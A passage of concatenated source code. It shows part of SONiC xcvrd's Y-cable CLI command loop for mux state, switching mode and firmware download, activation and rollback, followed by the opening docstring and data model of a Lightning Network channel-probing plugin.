        xcvrd_config_hwmode_swmode_cmd_tbl[asic_id] = swsscommon.SubscriberStateTable(
            appl_db[asic_id], "XCVRD_CONFIG_HWMODE_SWMODE_CMD")
        xcvrd_config_hwmode_swmode_cmd_sts_tbl[asic_id] = swsscommon.Table(
            appl_db[asic_id], "XCVRD_CONFIG_HWMODE_SWMODE_CMD")
        xcvrd_config_hwmode_swmode_rsp_tbl[asic_id] = swsscommon.Table(
            state_db[asic_id], "XCVRD_CONFIG_HWMODE_SWMODE_RSP")
        xcvrd_show_hwmode_swmode_cmd_tbl[asic_id] = swsscommon.SubscriberStateTable(
            appl_db[asic_id], "XCVRD_SHOW_HWMODE_SWMODE_CMD")
        xcvrd_show_hwmode_swmode_cmd_sts_tbl[asic_id] = swsscommon.Table(
            appl_db[asic_id], "XCVRD_SHOW_HWMODE_SWMODE_CMD")
        xcvrd_show_hwmode_swmode_rsp_tbl[asic_id] = swsscommon.Table(
            state_db[asic_id], "XCVRD_SHOW_HWMODE_SWMODE_RSP")
        # NOTE(review): xcvrd_down_fw_status_cmd_tbl is subscribed here but no
        # handler loop below drains it — confirm whether that is intentional.
        sel.addSelectable(xcvrd_log_tbl[asic_id])
        sel.addSelectable(xcvrd_down_fw_cmd_tbl[asic_id])
        sel.addSelectable(xcvrd_down_fw_status_cmd_tbl[asic_id])
        sel.addSelectable(xcvrd_acti_fw_cmd_tbl[asic_id])
        sel.addSelectable(xcvrd_roll_fw_cmd_tbl[asic_id])
        sel.addSelectable(xcvrd_show_fw_cmd_tbl[asic_id])
        sel.addSelectable(xcvrd_show_hwmode_dir_cmd_tbl[asic_id])
        sel.addSelectable(xcvrd_config_hwmode_state_cmd_tbl[asic_id])
        sel.addSelectable(xcvrd_show_hwmode_swmode_cmd_tbl[asic_id])
        sel.addSelectable(xcvrd_config_hwmode_swmode_cmd_tbl[asic_id])

    # Listen indefinitely for changes to the XCVRD_CMD_TABLE in the Application DB's
    while True:
        # Use timeout to prevent ignoring the signals we want to handle
        # in signal_handler() (e.g. SIGTERM for graceful shutdown)
        if self.task_stopping_event.is_set():
            break

        (state, selectableObj) = sel.select(SELECT_TIMEOUT)

        if state == swsscommon.Select.TIMEOUT:
            # Do not flood log when select times out
            continue
        if state != swsscommon.Select.OBJECT:
            helper_logger.log_warning(
                "sel.select() did not return swsscommon.Select.OBJECT for sonic_y_cable updates")
            continue

        # Get the redisselect object from selectable object
        redisSelectObj = swsscommon.CastSelectableToRedisSelectObj(
            selectableObj)
        # Get the corresponding namespace from redisselect db connector object
        namespace = redisSelectObj.getDbConnector().getNamespace()
        asic_index = multi_asic.get_asic_index_from_namespace(namespace)

        # --- XCVRD_LOG: enable/disable debug logging ---
        while True:
            (key, op_m, fvp_m) = xcvrd_log_tbl[asic_index].pop()
            if not key:
                break

            helper_logger.log_notice("Y_CABLE_DEBUG: trying to enable/disable debug logs")
            if fvp_m:
                # BUGFIX: was `key is "Y_CABLE"` — identity comparison against a
                # string literal is implementation-dependent; use equality.
                if key == "Y_CABLE":
                    continue

                fvp_dict = dict(fvp_m)
                if "log_verbosity" in fvp_dict:
                    # check if xcvrd got a probe command
                    probe_identifier = fvp_dict["log_verbosity"]

                    if probe_identifier == "debug":
                        helper_logger.set_min_log_priority_debug()
                    elif probe_identifier == "notice":
                        helper_logger.set_min_log_priority_notice()

        # --- show muxcable hwmode muxdirection ---
        while True:
            # show muxcable hwmode state <port>
            (port, op, fvp) = xcvrd_show_hwmode_dir_cmd_tbl[asic_index].pop()
            if not port:
                break

            if fvp:
                fvp_dict = dict(fvp)

                if "state" in fvp_dict:

                    physical_port = get_ycable_physical_port_from_logical_port(port, self.port_mapping)
                    if physical_port is None or physical_port == PHYSICAL_PORT_MAPPING_ERROR:
                        state = 'cable not present'
                        # error scenario update table accordingly
                        helper_logger.log_error(
                            "Error: Could not get physical port for cli command show mux hwmode muxdirection Y cable port {}".format(port))
                        set_result_and_delete_port('state', state, xcvrd_show_hwmode_dir_cmd_sts_tbl[asic_index], xcvrd_show_hwmode_dir_rsp_tbl[asic_index], port)
                        break

                    port_instance = get_ycable_port_instance_from_logical_port(port, self.port_mapping)
                    if port_instance is None or port_instance in port_mapping_error_values:
                        # error scenario update table accordingly
                        state = 'not Y-Cable port'
                        helper_logger.log_error(
                            "Error: Could not get port instance for cli command show mux hwmode muxdirection Y cable port {}".format(port))
                        set_result_and_delete_port('state', state, xcvrd_show_hwmode_dir_cmd_sts_tbl[asic_index], xcvrd_show_hwmode_dir_rsp_tbl[asic_index], port)
                        break

                    with y_cable_port_locks[physical_port]:
                        try:
                            read_side = port_instance.get_read_side()
                        except Exception as e:
                            read_side = None
                            helper_logger.log_warning("Failed to execute the get_read_side API for port {} due to {}".format(physical_port,repr(e)))

                    if read_side is None or read_side == port_instance.EEPROM_ERROR or read_side < 0:
                        state = 'unknown'
                        helper_logger.log_warning(
                            "Error: Could not get read side for cli command show mux hwmode muxdirection logical port {} and physical port {}".format(port, physical_port))
                        set_result_and_delete_port('state', state, xcvrd_show_hwmode_dir_cmd_sts_tbl[asic_index], xcvrd_show_hwmode_dir_rsp_tbl[asic_index], port)
                        break

                    with y_cable_port_locks[physical_port]:
                        try:
                            active_side = port_instance.get_mux_direction()
                        except Exception as e:
                            active_side = None
                            helper_logger.log_warning("Failed to execute the get_mux_direction API for port {} due to {}".format(physical_port,repr(e)))

                    if active_side is None or active_side == port_instance.EEPROM_ERROR or active_side < 0:
                        state = 'unknown'
                        helper_logger.log_warning("Error: Could not get active side for cli command show mux hwmode muxdirection logical port {} and physical port {}".format(port, physical_port))
                        set_result_and_delete_port('state', state, xcvrd_show_hwmode_dir_cmd_sts_tbl[asic_index], xcvrd_show_hwmode_dir_rsp_tbl[asic_index], port)
                        break

                    # active when this ToR owns the active side, standby otherwise
                    if read_side == active_side and (active_side == 1 or active_side == 2):
                        state = 'active'
                    elif read_side != active_side and (active_side == 1 or active_side == 2):
                        state = 'standby'
                    else:
                        state = 'unknown'
                        helper_logger.log_warning("Error: Could not get valid state for cli command show mux hwmode muxdirection logical port {} and physical port {}".format(port, physical_port))
                        set_result_and_delete_port('state', state, xcvrd_show_hwmode_dir_cmd_sts_tbl[asic_index], xcvrd_show_hwmode_dir_rsp_tbl[asic_index], port)
                        break

                    set_result_and_delete_port('state', state, xcvrd_show_hwmode_dir_cmd_sts_tbl[asic_index], xcvrd_show_hwmode_dir_rsp_tbl[asic_index], port)
                else:
                    helper_logger.log_warning("Error: Wrong input param for cli command show mux hwmode muxdirection logical port {}".format(port))
                    set_result_and_delete_port('state', 'unknown', xcvrd_show_hwmode_dir_cmd_sts_tbl[asic_index], xcvrd_show_hwmode_dir_rsp_tbl[asic_index], port)

        # --- config muxcable hwmode state active/standby ---
        while True:
            # Config muxcable hwmode state <active/standby> <port>
            (port, op, fvp) = xcvrd_config_hwmode_state_cmd_tbl[asic_index].pop()
            if not port:
                break

            if fvp:
                fvp_dict = dict(fvp)

                if "config" in fvp_dict:
                    config_state = str(fvp_dict["config"])

                    status = 'False'
                    physical_port = get_ycable_physical_port_from_logical_port(port, self.port_mapping)
                    if physical_port is None or physical_port == PHYSICAL_PORT_MAPPING_ERROR:
                        # error scenario update table accordingly
                        helper_logger.log_error(
                            "Error: Could not get physical port for cli command config mux hwmode state active/standby Y cable port {}".format(port))
                        set_result_and_delete_port('result', status, xcvrd_config_hwmode_state_cmd_sts_tbl[asic_index], xcvrd_config_hwmode_state_rsp_tbl[asic_index], port)
                        break

                    port_instance = get_ycable_port_instance_from_logical_port(port, self.port_mapping)
                    if port_instance is None or port_instance in port_mapping_error_values:
                        # error scenario update table accordingly
                        helper_logger.log_error(
                            "Error: Could not get port instance for cli command config mux hwmode state active/standby Y cable port {}".format(port))
                        set_result_and_delete_port('result', status, xcvrd_config_hwmode_state_cmd_sts_tbl[asic_index], xcvrd_config_hwmode_state_rsp_tbl[asic_index], port)
                        break

                    with y_cable_port_locks[physical_port]:
                        try:
                            read_side = port_instance.get_read_side()
                        except Exception as e:
                            read_side = None
                            helper_logger.log_warning("Failed to execute the get_read_side API for port {} due to {}".format(physical_port,repr(e)))

                    # BUGFIX: `is` → `==` for EEPROM_ERROR comparison
                    if read_side is None or read_side == port_instance.EEPROM_ERROR or read_side < 0:
                        status = 'False'
                        helper_logger.log_error(
                            "Error: Could not get read side for cli command config mux hwmode state active/standby Y cable port {}".format(port))
                        set_result_and_delete_port('result', status, xcvrd_config_hwmode_state_cmd_sts_tbl[asic_index], xcvrd_config_hwmode_state_rsp_tbl[asic_index], port)
                        break

                    # The toggle target depends on which ToR this daemon reads as:
                    # "active" means steer the mux to our own side, "standby" to the peer.
                    # BUGFIX: `is` → `==` for TARGET_TOR_A/B comparisons
                    if read_side == port_instance.TARGET_TOR_A:
                        if config_state == "active":
                            with y_cable_port_locks[physical_port]:
                                try:
                                    status = port_instance.toggle_mux_to_tor_a()
                                except Exception as e:
                                    status = -1
                                    helper_logger.log_warning("Failed to execute the toggle mux ToR A API for port {} due to {}".format(physical_port,repr(e)))
                        elif config_state == "standby":
                            with y_cable_port_locks[physical_port]:
                                try:
                                    status = port_instance.toggle_mux_to_tor_b()
                                except Exception as e:
                                    status = -1
                                    helper_logger.log_warning("Failed to execute the toggle mux ToR B API for port {} due to {}".format(physical_port,repr(e)))
                    elif read_side == port_instance.TARGET_TOR_B:
                        if config_state == 'active':
                            with y_cable_port_locks[physical_port]:
                                try:
                                    status = port_instance.toggle_mux_to_tor_b()
                                except Exception as e:
                                    status = -1
                                    helper_logger.log_warning("Failed to execute the toggle mux ToR B API for port {} due to {}".format(physical_port,repr(e)))
                        elif config_state == "standby":
                            with y_cable_port_locks[physical_port]:
                                try:
                                    status = port_instance.toggle_mux_to_tor_a()
                                except Exception as e:
                                    status = -1
                                    helper_logger.log_warning("Failed to execute the toggle mux ToR A API for port {} due to {}".format(physical_port,repr(e)))
                    else:
                        # BUGFIX: original referenced undefined
                        # xcvrd_show_hwmode_state_cmd_sts_tbl here (NameError)
                        set_result_and_delete_port('result', status, xcvrd_config_hwmode_state_cmd_sts_tbl[asic_index], xcvrd_config_hwmode_state_rsp_tbl[asic_index], port)
                        helper_logger.log_error(
                            "Error: Could not get valid config read side for cli command config mux hwmode state active/standby Y cable port {}".format(port))
                        break

                    set_result_and_delete_port('result', status, xcvrd_config_hwmode_state_cmd_sts_tbl[asic_index], xcvrd_config_hwmode_state_rsp_tbl[asic_index], port)
                else:
                    helper_logger.log_error("Error: Wrong input param for cli command config mux hwmode state active/standby logical port {}".format(port))
                    # BUGFIX: same undefined-table fix as above
                    set_result_and_delete_port('result', 'False', xcvrd_config_hwmode_state_cmd_sts_tbl[asic_index], xcvrd_config_hwmode_state_rsp_tbl[asic_index], port)

        # --- show muxcable hwmode switchmode ---
        while True:
            # Config muxcable hwmode setswitchmode <auto/manual> <port>
            (port, op, fvp) = xcvrd_show_hwmode_swmode_cmd_tbl[asic_index].pop()
            if not port:
                break

            if fvp:
                fvp_dict = dict(fvp)

                if "state" in fvp_dict:
                    state = 'unknown'

                    physical_port = get_ycable_physical_port_from_logical_port(port, self.port_mapping)
                    if physical_port is None or physical_port == PHYSICAL_PORT_MAPPING_ERROR:
                        # error scenario update table accordingly
                        helper_logger.log_error(
                            "Error: Could not get physical port for cli cmd show mux hwmode switchmode Y cable port {}".format(port))
                        state = 'cable not present'
                        set_result_and_delete_port('state', state, xcvrd_show_hwmode_swmode_cmd_sts_tbl[asic_index], xcvrd_show_hwmode_swmode_rsp_tbl[asic_index], port)
                        break

                    # BUGFIX: original omitted self.port_mapping here, unlike
                    # every other call site (TypeError at runtime)
                    port_instance = get_ycable_port_instance_from_logical_port(port, self.port_mapping)
                    if port_instance is None or port_instance in port_mapping_error_values:
                        # error scenario update table accordingly
                        helper_logger.log_error(
                            "Error: Could not get port instance for cli cmd show mux hwmode switchmode Y cable port {}".format(port))
                        state = 'not Y-Cable port'
                        set_result_and_delete_port('state', state, xcvrd_show_hwmode_swmode_cmd_sts_tbl[asic_index], xcvrd_show_hwmode_swmode_rsp_tbl[asic_index], port)
                        break

                    with y_cable_port_locks[physical_port]:
                        try:
                            result = port_instance.get_switching_mode()
                        except Exception as e:
                            result = None
                            helper_logger.log_warning("Failed to execute the get_switching_mode for port {} due to {}".format(physical_port,repr(e)))

                    if result is None or result == port_instance.EEPROM_ERROR or result < 0:
                        helper_logger.log_error(
                            "Error: Could not get read side for cli cmd show mux hwmode switchmode logical port {} and physical port {}".format(port, physical_port))
                        set_result_and_delete_port('state', state, xcvrd_show_hwmode_swmode_cmd_sts_tbl[asic_index], xcvrd_show_hwmode_swmode_rsp_tbl[asic_index], port)
                        break

                    if result == port_instance.SWITCHING_MODE_AUTO:
                        state = "auto"
                    elif result == port_instance.SWITCHING_MODE_MANUAL:
                        state = "manual"
                    else:
                        state = "unknown"
                    set_result_and_delete_port('state', state, xcvrd_show_hwmode_swmode_cmd_sts_tbl[asic_index], xcvrd_show_hwmode_swmode_rsp_tbl[asic_index], port)
                else:
                    helper_logger.log_error("Error: Incorrect input param for cli cmd show mux hwmode switchmode logical port {}".format(port))
                    set_result_and_delete_port('state', 'unknown', xcvrd_show_hwmode_swmode_cmd_sts_tbl[asic_index], xcvrd_show_hwmode_swmode_rsp_tbl[asic_index], port)

        # --- config muxcable hwmode setswitchmode ---
        while True:
            # Config muxcable hwmode setswitchmode <auto/manual> <port>
            (port, op, fvp) = xcvrd_config_hwmode_swmode_cmd_tbl[asic_index].pop()
            if not port:
                break

            if fvp:
                fvp_dict = dict(fvp)

                if "config" in fvp_dict:
                    config_mode = str(fvp_dict["config"])

                    status = 'False'
                    physical_port = get_ycable_physical_port_from_logical_port(port, self.port_mapping)
                    if physical_port is None or physical_port == PHYSICAL_PORT_MAPPING_ERROR:
                        # error scenario update table accordingly
                        helper_logger.log_error(
                            "Error: Could not get physical port for cli cmd config mux hwmode setswitchmode Y cable port {}".format(port))
                        set_result_and_delete_port('result', status, xcvrd_config_hwmode_swmode_cmd_sts_tbl[asic_index], xcvrd_config_hwmode_swmode_rsp_tbl[asic_index], port)
                        break

                    port_instance = get_ycable_port_instance_from_logical_port(port, self.port_mapping)
                    if port_instance is None or port_instance in port_mapping_error_values:
                        # error scenario update table accordingly
                        helper_logger.log_error(
                            "Error: Could not get port instance for cli cmd config mux hwmode setswitchmode Y cable port {}".format(port))
                        set_result_and_delete_port('result', status, xcvrd_config_hwmode_swmode_cmd_sts_tbl[asic_index], xcvrd_config_hwmode_swmode_rsp_tbl[asic_index], port)
                        break

                    if config_mode == "auto":
                        with y_cable_port_locks[physical_port]:
                            try:
                                result = port_instance.set_switching_mode(port_instance.SWITCHING_MODE_AUTO)
                            except Exception as e:
                                result = None
                                helper_logger.log_warning("Failed to execute the set_switching_mode auto for port {} due to {}".format(physical_port,repr(e)))
                        if result is None or result == port_instance.EEPROM_ERROR or result < 0:
                            status = 'False'
                            helper_logger.log_error(
                                "Error: Could not get read side for cli cmd config mux hwmode setswitchmode logical port {} and physical port {}".format(port, physical_port))
                            set_result_and_delete_port('result', status, xcvrd_config_hwmode_swmode_cmd_sts_tbl[asic_index], xcvrd_config_hwmode_swmode_rsp_tbl[asic_index], port)
                            break
                    elif config_mode == "manual":
                        with y_cable_port_locks[physical_port]:
                            try:
                                result = port_instance.set_switching_mode(port_instance.SWITCHING_MODE_MANUAL)
                            except Exception as e:
                                result = None
                                helper_logger.log_warning("Failed to execute the set_switching_mode manual for port {} due to {}".format(physical_port,repr(e)))
                        # BUGFIX: `is` → `==` for EEPROM_ERROR comparison
                        if result is None or result == port_instance.EEPROM_ERROR or result < 0:
                            status = 'False'
                            helper_logger.log_error(
                                "Error: Could not get read side for cli cmd config mux hwmode setswitchmode logical port {} and physical port {}".format(port, physical_port))
                            set_result_and_delete_port('result', status, xcvrd_config_hwmode_swmode_cmd_sts_tbl[asic_index], xcvrd_config_hwmode_swmode_rsp_tbl[asic_index], port)
                            break
                    else:
                        helper_logger.log_error(
                            "Error: Incorrect Config state for cli cmd config mux hwmode setswitchmode logical port {} and physical port {}".format(port, physical_port))
                        set_result_and_delete_port('result', status, xcvrd_config_hwmode_swmode_cmd_sts_tbl[asic_index], xcvrd_config_hwmode_swmode_rsp_tbl[asic_index], port)
                        break

                    set_result_and_delete_port('result', result, xcvrd_config_hwmode_swmode_cmd_sts_tbl[asic_index], xcvrd_config_hwmode_swmode_rsp_tbl[asic_index], port)
                else:
                    helper_logger.log_error("Error: Incorrect input param for cli cmd config mux hwmode setswitchmode logical port {}".format(port))
                    set_result_and_delete_port('result', 'False', xcvrd_config_hwmode_swmode_cmd_sts_tbl[asic_index], xcvrd_config_hwmode_swmode_rsp_tbl[asic_index], port)

        # --- config muxcable firmware download ---
        while True:
            (port, op, fvp) = xcvrd_down_fw_cmd_tbl[asic_index].pop()
            if not port:
                break

            if fvp:
                # This check might be redundant, to check, the presence of this Port in keys
                # in logical_port_list but keep for now for coherency
                # also skip checking in logical_port_list inside sfp_util
                fvp_dict = dict(fvp)

                if "download_firmware" in fvp_dict:

                    file_name = fvp_dict["download_firmware"]
                    file_full_path = '/usr/share/sonic/firmware/{}'.format(file_name)

                    status = -1

                    if not os.path.isfile(file_full_path):
                        helper_logger.log_error("Error: cli cmd download firmware file does not exist port {} file {}".format(port, file_name))
                        set_result_and_delete_port('status', status, xcvrd_down_fw_cmd_sts_tbl[asic_index], xcvrd_down_fw_rsp_tbl[asic_index], port)
                        break

                    physical_port = get_ycable_physical_port_from_logical_port(port, self.port_mapping)
                    if physical_port is None or physical_port == PHYSICAL_PORT_MAPPING_ERROR:
                        # error scenario update table accordingly
                        helper_logger.log_error(
                            "Error: Could not get physical port for cli cmd download firmware cli Y cable port {}".format(port))
                        set_result_and_delete_port('status', status, xcvrd_down_fw_cmd_sts_tbl[asic_index], xcvrd_down_fw_rsp_tbl[asic_index], port)
                        break

                    port_instance = get_ycable_port_instance_from_logical_port(port, self.port_mapping)
                    if port_instance is None or port_instance in port_mapping_error_values:
                        # error scenario update table accordingly
                        helper_logger.log_error(
                            "Error: Could not get port instance for cli cmd download firmware Y cable port {}".format(port))
                        set_result_and_delete_port('status', status, xcvrd_down_fw_cmd_sts_tbl[asic_index], xcvrd_down_fw_rsp_tbl[asic_index], port)
                        break

                    # Firmware download is slow; run it in a dedicated thread and
                    # let the worker write the response tables when done.
                    rc = {}
                    self.task_download_firmware_thread[physical_port] = threading.Thread(target=task_download_firmware_worker, args=(port, physical_port, port_instance, file_full_path, xcvrd_down_fw_rsp_tbl[asic_index], xcvrd_down_fw_cmd_sts_tbl[asic_index], rc,))
                    self.task_download_firmware_thread[physical_port].start()
                else:
                    helper_logger.log_error(
                        "Error: Wrong input parameter get for cli cmd download firmware Y cable port {}".format(port))
                    set_result_and_delete_port('status', '-1', xcvrd_down_fw_cmd_sts_tbl[asic_index], xcvrd_down_fw_rsp_tbl[asic_index], port)

        # --- show muxcable firmware version ---
        while True:
            (port, op, fvp) = xcvrd_show_fw_cmd_tbl[asic_index].pop()
            if not port:
                break

            if fvp:
                fvp_dict = dict(fvp)

                mux_info_dict = {}
                mux_info_dict['version_self_active'] = 'N/A'
                mux_info_dict['version_self_inactive'] = 'N/A'
                mux_info_dict['version_self_next'] = 'N/A'
                mux_info_dict['version_peer_active'] = 'N/A'
                mux_info_dict['version_peer_inactive'] = 'N/A'
                mux_info_dict['version_peer_next'] = 'N/A'
                mux_info_dict['version_nic_active'] = 'N/A'
                mux_info_dict['version_nic_inactive'] = 'N/A'
                mux_info_dict['version_nic_next'] = 'N/A'

                if "firmware_version" in fvp_dict:

                    status = 'False'
                    physical_port = get_ycable_physical_port_from_logical_port(port, self.port_mapping)
                    if physical_port is None or physical_port == PHYSICAL_PORT_MAPPING_ERROR:
                        # error scenario update table accordingly
                        helper_logger.log_warning("Error: Could not get physical port for cli cmd show firmware port {}".format(port))
                        set_result_and_delete_port('status', status, xcvrd_show_fw_cmd_sts_tbl[asic_index], xcvrd_show_fw_rsp_tbl[asic_index], port)
                        set_show_firmware_fields(port, mux_info_dict, xcvrd_show_fw_res_tbl[asic_index])
                        break

                    port_instance = get_ycable_port_instance_from_logical_port(port, self.port_mapping)
                    if port_instance is None or port_instance in port_mapping_error_values:
                        # error scenario update table accordingly
                        helper_logger.log_warning("Error: Could not get port instance for cli cmd show firmware command port {}".format(port))
                        set_show_firmware_fields(port, mux_info_dict, xcvrd_show_fw_res_tbl[asic_index])
                        set_result_and_delete_port('status', status, xcvrd_show_fw_cmd_sts_tbl[asic_index], xcvrd_show_fw_rsp_tbl[asic_index], port)
                        break

                    with y_cable_port_locks[physical_port]:
                        try:
                            read_side = port_instance.get_read_side()
                        except Exception as e:
                            read_side = None
                            helper_logger.log_warning("Failed to execute the get_read_side API for port {} due to {}".format(physical_port,repr(e)))

                    # BUGFIX: `is` → `==` for EEPROM_ERROR comparison
                    if read_side is None or read_side == port_instance.EEPROM_ERROR or read_side < 0:
                        status = 'False'
                        helper_logger.log_warning("Error: Could not get read side for cli cmd show firmware port {}".format(port))
                        set_show_firmware_fields(port, mux_info_dict, xcvrd_show_fw_res_tbl[asic_index])
                        set_result_and_delete_port('status', status, xcvrd_show_fw_cmd_sts_tbl[asic_index], xcvrd_show_fw_rsp_tbl[asic_index], port)
                        break

                    # "self"/"peer" naming depends on which ToR this daemon reads as
                    get_firmware_dict(physical_port, port_instance, port_instance.TARGET_NIC, "nic", mux_info_dict, port)
                    if read_side == port_instance.TARGET_TOR_A:
                        get_firmware_dict(physical_port, port_instance, port_instance.TARGET_TOR_A, "self", mux_info_dict, port)
                        get_firmware_dict(physical_port, port_instance, port_instance.TARGET_TOR_B, "peer", mux_info_dict, port)
                    else:
                        get_firmware_dict(physical_port, port_instance, port_instance.TARGET_TOR_A, "peer", mux_info_dict, port)
                        get_firmware_dict(physical_port, port_instance, port_instance.TARGET_TOR_B, "self", mux_info_dict, port)

                    status = 'True'
                    set_show_firmware_fields(port, mux_info_dict, xcvrd_show_fw_res_tbl[asic_index])
                    set_result_and_delete_port('status', status, xcvrd_show_fw_cmd_sts_tbl[asic_index], xcvrd_show_fw_rsp_tbl[asic_index], port)
                else:
                    helper_logger.log_error("Wrong param for cli cmd show firmware port {}".format(port))
                    set_show_firmware_fields(port, mux_info_dict, xcvrd_show_fw_res_tbl[asic_index])
                    set_result_and_delete_port('status', 'False', xcvrd_show_fw_cmd_sts_tbl[asic_index], xcvrd_show_fw_rsp_tbl[asic_index], port)

        # --- config muxcable firmware activate ---
        while True:
            (port, op, fvp) = xcvrd_acti_fw_cmd_tbl[asic_index].pop()
            if not port:
                break

            if fvp:
                fvp_dict = dict(fvp)

                if "activate_firmware" in fvp_dict:
                    file_name = fvp_dict["activate_firmware"]

                    status = 'False'

                    # 'null' means activate whatever is already staged
                    if file_name == 'null':
                        file_full_path = None
                    else:
                        file_full_path = '/usr/share/sonic/firmware/{}'.format(file_name)
                        if not os.path.isfile(file_full_path):
                            helper_logger.log_error("ERROR: cli cmd mux activate firmware file does not exist port {} file {}".format(port, file_name))
                            # BUGFIX: respond on the activate-firmware tables, not the
                            # download-firmware tables, so the waiting CLI sees the failure
                            set_result_and_delete_port('status', status, xcvrd_acti_fw_cmd_sts_tbl[asic_index], xcvrd_acti_fw_rsp_tbl[asic_index], port)
                            break

                    physical_port = get_ycable_physical_port_from_logical_port(port, self.port_mapping)
                    if physical_port is None or physical_port == PHYSICAL_PORT_MAPPING_ERROR:
                        # error scenario update table accordingly
                        helper_logger.log_warning("Error: Could not get physical port for cli cmd mux activate firmware port {}".format(port))
                        set_result_and_delete_port('status', status, xcvrd_acti_fw_cmd_sts_tbl[asic_index], xcvrd_acti_fw_rsp_tbl[asic_index], port)
                        break

                    port_instance = get_ycable_port_instance_from_logical_port(port, self.port_mapping)
                    if port_instance is None or port_instance in port_mapping_error_values:
                        helper_logger.log_warning("Error: Could not get port instance for cli cmd mux activate firmware port {}".format(port))
                        # error scenario update table accordingly
                        set_result_and_delete_port('status', status, xcvrd_acti_fw_cmd_sts_tbl[asic_index], xcvrd_acti_fw_rsp_tbl[asic_index], port)
                        break

                    with y_cable_port_locks[physical_port]:
                        try:
                            status = port_instance.activate_firmware(file_full_path, True)
                        except Exception as e:
                            status = -1
                            helper_logger.log_warning("Failed to execute the activate_firmware API for port {} due to {}".format(physical_port,repr(e)))

                    set_result_and_delete_port('status', status, xcvrd_acti_fw_cmd_sts_tbl[asic_index], xcvrd_acti_fw_rsp_tbl[asic_index], port)
                else:
                    helper_logger.log_error("Wrong param for cli cmd mux activate firmware port {}".format(port))
                    set_result_and_delete_port('status', 'False', xcvrd_acti_fw_cmd_sts_tbl[asic_index], xcvrd_acti_fw_rsp_tbl[asic_index], port)

        # --- config muxcable firmware rollback ---
        while True:
            (port, op, fvp) = xcvrd_roll_fw_cmd_tbl[asic_index].pop()
            if not port:
                break

            if fvp:
                fvp_dict = dict(fvp)

                if "rollback_firmware" in fvp_dict:
                    file_name = fvp_dict["rollback_firmware"]
                    status = 'False'

                    # 'null' means roll back without a specific image file
                    if file_name == 'null':
                        file_full_path = None
                    else:
                        file_full_path = '/usr/share/sonic/firmware/{}'.format(file_name)
                        if not os.path.isfile(file_full_path):
                            helper_logger.log_error("Error: cli cmd mux rollback firmware file does not exist port {} file {}".format(port, file_name))
                            # BUGFIX: respond on the rollback-firmware tables, not the
                            # download-firmware tables
                            set_result_and_delete_port('status', status, xcvrd_roll_fw_cmd_sts_tbl[asic_index], xcvrd_roll_fw_rsp_tbl[asic_index], port)
                            break

                    physical_port = get_ycable_physical_port_from_logical_port(port, self.port_mapping)
                    if physical_port is None or physical_port == PHYSICAL_PORT_MAPPING_ERROR:
                        # error scenario update table accordingly
                        helper_logger.log_warning("Error: Could not get physical port for cli cmd mux rollback firmware port {}".format(port))
                        set_result_and_delete_port('status', status, xcvrd_roll_fw_cmd_sts_tbl[asic_index], xcvrd_roll_fw_rsp_tbl[asic_index], port)
                        break

                    port_instance = get_ycable_port_instance_from_logical_port(port, self.port_mapping)
                    if port_instance is None or port_instance in port_mapping_error_values:
                        # error scenario update table accordingly
                        helper_logger.log_warning("Error: Could not get port instance for cli cmd mux rollback firmware port {}".format(port))
                        set_result_and_delete_port('status', status, xcvrd_roll_fw_cmd_sts_tbl[asic_index], xcvrd_roll_fw_rsp_tbl[asic_index], port)
                        # BUGFIX: original fell through and called rollback_firmware
                        # on the invalid port_instance; stop here instead
                        break

                    with y_cable_port_locks[physical_port]:
                        try:
                            status = port_instance.rollback_firmware(file_full_path)
                        except Exception as e:
                            status = -1
                            helper_logger.log_warning("Failed to execute the rollback_firmware API for port {} due to {}".format(physical_port,repr(e)))

                    set_result_and_delete_port('status', status, xcvrd_roll_fw_cmd_sts_tbl[asic_index], xcvrd_roll_fw_rsp_tbl[asic_index], port)
                else:
                    helper_logger.log_error("Wrong param for cli cmd mux rollback firmware port {}".format(port))
                    set_result_and_delete_port('status', 'False', xcvrd_roll_fw_cmd_sts_tbl[asic_index], xcvrd_roll_fw_rsp_tbl[asic_index], port)
def task_run(self):
    """Spawn the main worker thread and the CLI worker thread for this task."""
    self.task_thread = threading.Thread(target=self.task_worker)
    self.task_cli_thread = threading.Thread(target=self.task_cli_worker)
    for worker in (self.task_thread, self.task_cli_thread):
        worker.start()
def task_stop(self):
    """Signal all task threads to stop and block until they have exited."""
    self.task_stopping_event.set()
    helper_logger.log_info("stopping the cli and probing task threads xcvrd")
    for worker in (self.task_thread, self.task_cli_thread):
        worker.join()
    # Also wait for any per-port firmware-download threads still running.
    for port in list(self.task_download_firmware_thread):
        self.task_download_firmware_thread[port].join()
    helper_logger.log_info("stopped all thread")
|
probe.py | #!/usr/bin/env python3
"""Plugin that probes the network for failed channels.
This plugin regularly performs a random probe of the network by sending a
payment to a random node in the network, with a random `payment_hash`, and
observing how the network reacts. The random `payment_hash` results in the
payments being rejected at the destination, so no funds are actually
transferred. The error messages however allow us to gather some information
about the success probability of a payment, and the stability of the channels.
The random selection of destination nodes is a worst case scenario, since it's
likely that most of the nodes in the network are leaf nodes that are not
well-connected and often offline at any point in time. Expect to see a lot of
errors about being unable to route these payments as a result of this.
The probe data is stored in a sqlite3 database for later inspection and to be
able to eventually draw pretty plots about how the network stability changes
over time. For now you can inspect the results using the `sqlite3` command
line utility:
```bash
sqlite3 ~/.lightning/probes.db "select destination, erring_channel, failcode from probes"
```
Failcode -1 and 16399 are special:
- -1 indicates that we were unable to find a route to the destination. This
usually indicates that this is a leaf node that is currently offline.
- 16399 is the code for unknown payment details and indicates a successful
probe. The destination received the incoming payment but could not find a
matching `payment_key`, which is expected since we generated the
`payment_hash` at random :-)
"""
from datetime import datetime
from pyln.client import Plugin, RpcError
from random import choice
from sqlalchemy import Column, Integer, String, DateTime
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
from time import sleep, time
import heapq
import json
import os
import random
import string
import threading
# SQLAlchemy declarative base for the Probe model defined below.
Base = declarative_base()
# The pyln plugin instance; RPC methods and options are registered on it.
plugin = Plugin()
# Channels excluded for the lifetime of this process after hard failures.
exclusions = []
# Map of channel-exclusion string -> expiry timestamp (epoch seconds).
temporary_exclusions = {}
class Probe(Base):
    """ORM model recording a single probe attempt and its outcome."""
    __tablename__ = "probes"
    id = Column(Integer, primary_key=True)
    destination = Column(String)    # node_id that was probed
    route = Column(String)          # comma-separated short channel ids
    error = Column(String)          # raw error payload, JSON-encoded
    erring_channel = Column(String)
    failcode = Column(Integer)      # -1 = no route; 16399 = successful probe
    payment_hash = Column(String)
    started_at = Column(DateTime)
    finished_at = Column(DateTime)

    def jsdict(self):
        """Return a JSON-serializable summary of this probe."""
        return {
            'id': self.id,
            'destination': self.destination,
